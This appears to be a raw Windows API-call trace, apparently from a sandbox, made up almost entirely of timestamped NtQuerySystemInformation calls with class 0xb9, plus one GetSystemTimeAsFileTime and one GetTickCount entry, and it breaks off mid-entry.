[0281.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd40, Length=0x28, ResultLength=0x0) [0281.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x38, ResultLength=0x0) [0281.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0281.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0281.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0281.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc20, Length=0x20, ResultLength=0x0) [0281.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce20, Length=0x38, ResultLength=0x0) [0281.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcca0, Length=0x20, ResultLength=0x0) [0281.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x20, ResultLength=0x0) [0281.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc30, Length=0x20, ResultLength=0x0) [0281.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.409] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a68fcf50 | out: lpSystemTimeAsFileTime=0xf7a68fcf50*(dwLowDateTime=0x3a198eb5, dwHighDateTime=0x1d63874)) [0281.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd008, Length=0x50, ResultLength=0x0) [0281.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcf40, Length=0x28, ResultLength=0x0) [0281.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fce58, Length=0x50, ResultLength=0x0) [0281.409] GetTickCount () returned 0x1186743 [0281.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd28, Length=0x58, ResultLength=0x0) [0281.409] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0281.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0281.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0281.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0281.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca70, Length=0x28, ResultLength=0x0) [0281.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcae0, Length=0x28, ResultLength=0x0) [0281.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0281.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x28, ResultLength=0x0) [0281.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb60, Length=0x28, ResultLength=0x0) [0281.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0281.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0281.417] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0281.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0281.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x20, ResultLength=0x0) [0281.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc40, Length=0x38, ResultLength=0x0) [0281.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcac0, Length=0x20, ResultLength=0x0) [0281.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0281.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca50, Length=0x20, ResultLength=0x0) [0281.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd28, Length=0x58, ResultLength=0x0) [0281.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.424] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0281.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0281.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0281.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca40, Length=0x28, ResultLength=0x0) [0281.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcab0, Length=0x28, ResultLength=0x0) [0281.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x28, ResultLength=0x0) [0281.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb30, Length=0x28, ResultLength=0x0) [0281.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.431] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9a0, Length=0x20, ResultLength=0x0) [0281.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb70, Length=0x20, ResultLength=0x0) [0281.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.432] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0281.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.433] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0281.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca10, Length=0x20, ResultLength=0x0) [0281.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcc00, Length=0x38, ResultLength=0x0) [0281.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca90, Length=0x20, ResultLength=0x0) [0281.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0281.434] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca20, Length=0x20, ResultLength=0x0) [0281.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcd28, Length=0x58, ResultLength=0x0) [0281.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x58, ResultLength=0x0) [0281.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.435] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.440] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc9b0, Length=0x28, ResultLength=0x0) [0281.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.441] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.444] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fca30, Length=0x28, ResultLength=0x0) [0281.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0281.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc910, Length=0x20, ResultLength=0x0) [0281.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.445] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc990, Length=0x20, ResultLength=0x0) [0281.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc920, Length=0x20, ResultLength=0x0) [0281.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.446] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcbf0, Length=0x58, ResultLength=0x0) [0281.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.447] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fcb10, Length=0x38, ResultLength=0x0) [0281.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0281.449] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fc940, Length=0x28, ResultLength=0x0) [0281.449] 